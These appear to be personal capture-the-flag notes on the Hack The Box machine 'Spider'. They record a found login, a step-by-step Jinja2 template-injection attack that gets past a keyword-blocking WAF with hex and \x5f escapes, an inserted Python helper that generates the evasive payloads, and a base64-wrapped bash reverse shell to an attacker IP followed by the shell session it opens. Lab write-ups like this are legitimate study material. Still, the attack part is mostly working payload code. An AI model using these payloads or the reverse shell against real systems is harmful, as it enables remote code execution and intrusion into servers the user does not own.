# got creds chiv:ch1VW4sHERE7331
# can use creds to login to spider.htb/login as chiv
Welcome to the admin panel, chiv.
| can submit new message
| view Messages
| View Support
http://spider.htb/view?check=messages
Staff of ID: '1' posted on: 2020-04-24 15:02:41
Fix the /a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal portal!
http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal
Submit a support ticket!
Welcome to the support portal!
| Contact # or Email:
| Message
SSTI (again)
injecting in both fields at http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal
checking response at http://spider.htb/view?check=support
{{config}}
# response
Why would you need '{{' or '}}' in a contact value?
# {{7*7}} in the Message field alone is not evaluated, so the Contact # or Email field is the injection point
# trying more Jinja2 SSTI payloads from https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
{% debug %}
# response
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
# almost all payloads contain {{ }}; skip those, every one of them comes back with the same rejection:
| Why would you need '{{' or '}}' in a contact value?
request.__class__
# response
Hmmm, you seem to have hit a our WAF with the following chars: _ .
# there is a blacklist check
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}
{%endif%}
{%endfor%}
# same payload with every attribute name hex-encoded and rebuilt at render time via decode("hex"), so no literal _ or . appears:
{% for a in []["5F5F636C6173735F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F626173655F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F737562636C61737365735F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]() %}
{% if "7761726E696E67"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78") in a["5F5F6E616D655F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")] %}
{{a()["5F6D6F64756C65"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F6275696C74696E735F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]["5F5F696D706F72745F5F"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]("6F73"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78"))["706F70656E"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]("6563686F2024666C6167"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78"))["72656164"["\x64\x65\x63\x6F\x64\x65"]("\x68\x65\x78")]()}}
{%endif%}
{%endfor%}
# but it still has '{{' '}}'
# removed the {{ }} line and the WAF reported more blacklisted tokens:
Hmmm, you seem to have hit a our WAF with the following chars: for if
# Testing for all special chars on keyboard: [{]};:'",<.>/?\|`!@#$%^&*()
# updated blacklist = {{ }} for if _ .
# with for, if, {{ and }} all blacklisted, none of the top Google results help
# looking at jinja built in tags to understand more
| came across {% set var=x %} ... {% endset %}
| Creates a var that exists within the scope
# from https://hackmd.io/@Chivato/HyWsJ31dI
modifying {% if 'chiv' == 'chiv' %} a {% endif %} to {% set a= "chiv" %} a {% endset %}
# response
Hmmm, you seem to have hit a our WAF with the following chars: set
# updated blacklist = {{ }} for if _ . set
# testing {% with myvar=1 %}...{% endwith %}
# using the payload from my notes
{{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']() }}
# replacing {{ }} with a {% %} statement
# replacing ' with "
# replacing _ with \x5f (Jinja decodes Python-style escapes inside string literals, so "\x5f\x5fglobals\x5f\x5f" is "__globals__" at render time while the request body contains no underscore)
{% request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('id')['read']() %}
# a bare expression is not a valid {% %} tag, so it needs a statement that evaluates one: with
| {% with %} ... {% endwith %}
{% with kashz=request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("id")["read"]() %} kashz {% endwith %}
# no error, but the output is only the literal text kashz: the expression is evaluated for the assignment but never rendered, so command output is not reflected (blind execution)
# reloading the page takes some time, possibly execution on backend?
# trying a blind payload
echo "bash -c 'bash -i >& /dev/tcp/10.10.16.7/6969 0>&1'"|base64
| YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi43LzY5NjkgMD4mMScK
# final payload
{% with kashz=request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi43LzY5NjkgMD4mMScK |base64 -d|bash")["read"]() %} kashz {% endwith %}
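As an added example (not part of the original notes and not the box's code), the following Python helper reproduces the two bypasses used above: the hex-encoded attribute names of the earlier `for`/`if` payload, and the `\x5f` escape plus `{% with %}` sink of the final payload, both checked against the blacklist recovered from the WAF responses. The blacklist (`{{ }} for if _ . set`) and the variable name `kashz` are taken from the notes; the function names are mine. One caveat the notes do not state: the `"...".decode("hex")` form only works if the target interpreter is Python 2, since `str.decode` does not exist in Python 3, which is one reason the `\x5f` escape is the more portable choice.

```python
from __future__ import annotations

# Blacklist reconstructed from the WAF messages in the notes (literal tokens, not a regex).
WAF_BLACKLIST = ("{{", "}}", "for", "if", "_", ".", "set")


def waf_hits(payload: str) -> list:
    """Return the blacklisted tokens present in payload, in blacklist order.
    An empty list means the payload would pass the filter as reconstructed here."""
    return [tok for tok in WAF_BLACKLIST if tok in payload]


def py2_hex_attr(name: str) -> str:
    """Jinja subscript that rebuilds `name` at render time via str.decode('hex').
    This is the encoding used in the {% for %} payload above. Python 2 only:
    str has no .decode() in Python 3, so the target would raise at render time."""
    hexed = name.encode().hex().upper()                       # "__class__" -> "5F5F636C6173735F5F"
    dec = "".join(f"\\x{ord(c):02X}" for c in "decode")       # "\x64\x65\x63\x6F\x64\x65"
    hx = "".join(f"\\x{ord(c):02X}" for c in "hex")           # "\x68\x65\x78"
    return f'"{hexed}"["{dec}"]("{hx}")'


def escape_underscores(payload: str) -> str:
    """Replace every `_` with the escape \\x5f. Jinja's lexer applies Python-style
    escape decoding to string literals, so the template sees '__globals__' while
    the raw request body never contains an underscore for the WAF to match."""
    return payload.replace("_", r"\x5f")


def jinja_literal_value(literal: str) -> str:
    """What a string literal's contents become after escape decoding (the same
    unicode-escape rules Python and Jinja use). Used to confirm the round trip."""
    return literal.encode("latin-1").decode("unicode_escape")


def build_with_payload(command: str, var: str = "kashz") -> str:
    """Build the {% with %} sink from the notes: the expression is evaluated for the
    assignment (so the command runs) but only the literal `var` text is rendered,
    which is why execution is blind and a reverse shell is used for the real run."""
    expr = (
        'request["application"]["__globals__"]["__builtins__"]["__import__"]("os")'
        f'["popen"]("{command}")["read"]()'
    )
    return "{% with " + var + "=" + escape_underscores(expr) + " %} " + var + " {% endwith %}"


if __name__ == "__main__":
    # Walk the same probes the notes sent, showing what the reconstructed filter flags.
    for probe in ("{{config}}", "request.__class__",
                  "{% for x in y %}{% if z %}{% endif %}{% endfor %}",
                  '{% set a = "chiv" %} a {% endset %}'):
        print(f"{probe!r:60} -> hits: {waf_hits(probe)}")
    print(py2_hex_attr("__class__"))
    final = build_with_payload("id")
    print(final)
    print("final payload passes filter:", waf_hits(final) == [])
    print("escaped literal decodes to:", jinja_literal_value(escape_underscores("__globals__")))
```

Swap the `command` argument for the base64 reverse-shell one-liner from the notes to get the exact final payload; because nothing in the rendered output changes, confirm execution from the listener side, not from the page.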
# we get a shell
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.243] 43738
bash: cannot set terminal process group (1597): Inappropriate ioctl for device
bash: no job control in this shell
chiv@spider:/var/www/webapp$ whoami;id;hostname;uname -a
chiv
uid=1000(chiv) gid=33(www-data) groups=33(www-data)
spider
Linux spider 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux